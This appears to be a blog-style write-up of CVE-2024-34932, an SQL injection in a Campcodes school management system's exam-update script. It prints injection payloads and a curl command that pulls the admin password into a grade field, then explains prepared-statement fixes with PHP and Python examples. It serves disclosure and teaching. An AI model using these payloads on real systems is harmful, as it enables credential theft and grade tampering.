CVE-2024-34932 - How a Simple SQL Injection Can Hack Your School Management System

In June 2024, CVE-2024-34932 was publicly disclosed, uncovering a critical SQL injection flaw in a popular educational product: Campcodes Complete Web-Based School Management System v1. This post explains in simple terms how the vulnerability works, shows step-by-step exploitation (with code), and gives references for further reading.

What Is the Vulnerability?

CVE-2024-34932 concerns a flaw in the file /model/update_exam.php. This script handles updating exam records in the system. Unfortunately, it does NOT sanitize or parameterize the value of the name parameter before placing it in a SQL query. That means: if you enter SQL code where a name is expected, the system's database may simply run it.

Bottom Line: An attacker can send their own SQL to the server and make it do whatever they want with the data—read stuff, change grades, or even erase records.

A typical HTTP POST request to update an exam might look like this:

POST /model/update_exam.php HTTP/1.1
Host: school.example.com
Content-Type: application/x-www-form-urlencoded

id=25&name=Final%20Science%20Exam

This should set the exam with id=25 to the new name.

2. Crafting A Malicious Payload

Because the name value is placed straight into a SQL query without sanitizing or parameter binding, SQL commands can be injected through it.

Example payload:

id=25&name=Hacked', result=(SELECT database()),'column

This payload *ends* the name value with ' (breaking out of the expected input), then runs SELECT database() as a side effect.

You can replicate this with curl (replace the URL with your own):

curl -X POST \
  -d "id=25&name=Hacked', grade=(SELECT password FROM users WHERE id=1)-- -" \
  http://school.example.com/model/update_exam.php

This tries to set the grade column for exam 25 to the admin's password (assuming a users table with typical column names and that the admin is user id 1). The double hyphen (--) starts a SQL comment, so the rest of the original query is ignored; MySQL requires whitespace after --, which is why the payload ends with "-- -".

The PHP file probably contains code like this (simplified):

<?php
$name = $_POST['name'];   // taken from the request as-is, no validation
$id = $_POST['id'];       // likewise, never checked to be numeric
// Both values are pasted into the SQL text, so a quote in $name changes the query's structure.
$sql = "UPDATE exams SET name='$name' WHERE id='$id'";
mysqli_query($conn, $sql);

If $name contains malicious SQL, it gets executed.

ALWAYS use prepared statements or parameterized queries when working with databases in PHP:

<?php
// Placeholders (?) keep the values out of the SQL text; the driver sends them separately as data.
$stmt = $conn->prepare("UPDATE exams SET name=? WHERE id=?");
$stmt->bind_param("si", $name, $id); // "s" = string for name, "i" = integer for id
$stmt->execute();
$stmt->close();
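To show concretely what the prepared statement changes, here is an added example (not code from the post or from the Campcodes product) that models both versions of the handler in Python against an in-memory SQLite table. The table name, the columns (id, name, grade) and the sample row are constructed assumptions standing in for the product's real schema; the payload has the same shape as the ones shown above, a quote that closes the name value followed by a second assignment. The vulnerable version lets that assignment run, while the bound version stores the whole string as the exam's name and also refuses a non-numeric id.

```python
import sqlite3


def fresh_db():
    # Constructed sample schema and data, assumed for the demonstration only.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE exams (id INTEGER PRIMARY KEY, name TEXT, grade TEXT)")
    conn.execute("INSERT INTO exams VALUES (25, 'Midterm', 'B')")
    conn.commit()
    return conn


def update_exam_vulnerable(conn, exam_id, name):
    # Mirrors the vulnerable PHP: request values are pasted straight into the SQL string,
    # so a quote inside `name` rewrites the statement instead of becoming part of the value.
    sql = f"UPDATE exams SET name='{name}' WHERE id='{exam_id}'"
    conn.execute(sql)
    conn.commit()


def update_exam_safe(conn, exam_id, name):
    # Mirrors the prepared-statement fix: the SQL text is fixed, values travel separately.
    # The id is validated as an integer first; anything else is rejected before any query runs.
    if not str(exam_id).isdigit():
        raise ValueError("exam id must be a positive integer")
    conn.execute("UPDATE exams SET name=? WHERE id=?", (name, int(exam_id)))
    conn.commit()


def read_exam(conn, exam_id):
    # Returns (name, grade) for the given exam, or None if it does not exist.
    return conn.execute("SELECT name, grade FROM exams WHERE id=?", (exam_id,)).fetchone()


# Constructed payload with the same shape as the post's examples: it closes the quoted
# name and smuggles a second column assignment into the SET list.
PAYLOAD = "Hacked', grade='A"


def demo():
    """Run the same payload through both handlers and return what each left in the table."""
    vuln = fresh_db()
    update_exam_vulnerable(vuln, "25", PAYLOAD)

    safe = fresh_db()
    update_exam_safe(safe, "25", PAYLOAD)

    return read_exam(vuln, 25), read_exam(safe, 25)


if __name__ == "__main__":
    vulnerable_row, safe_row = demo()
    print("string concatenation :", vulnerable_row)  # grade silently changed
    print("bound parameters     :", safe_row)        # payload stored as plain text, grade intact
```

The difference is purely where the untrusted value ends up: in the first handler it becomes part of the SQL grammar, in the second it can only ever be the contents of the name column. Validating the id as an integer is the equivalent of the "i" type in bind_param and closes the second injection point in the same statement.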

Official References

- CVE-2024-34932 — MITRE
- Product at Campcodes
- Exploit Database Listing (if/when available)
- OWASP SQL Injection Cheat Sheet

Final Words

CVE-2024-34932 is a textbook example of why you *never* stick user input directly into SQL. If your school, company, or customer uses Campcodes School Management System v1, you must patch this hole fast.

Remember: If you find a similar bug, always report it responsibly — and patch before someone less friendly finds it!

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/20/2024 16:35:19 UTC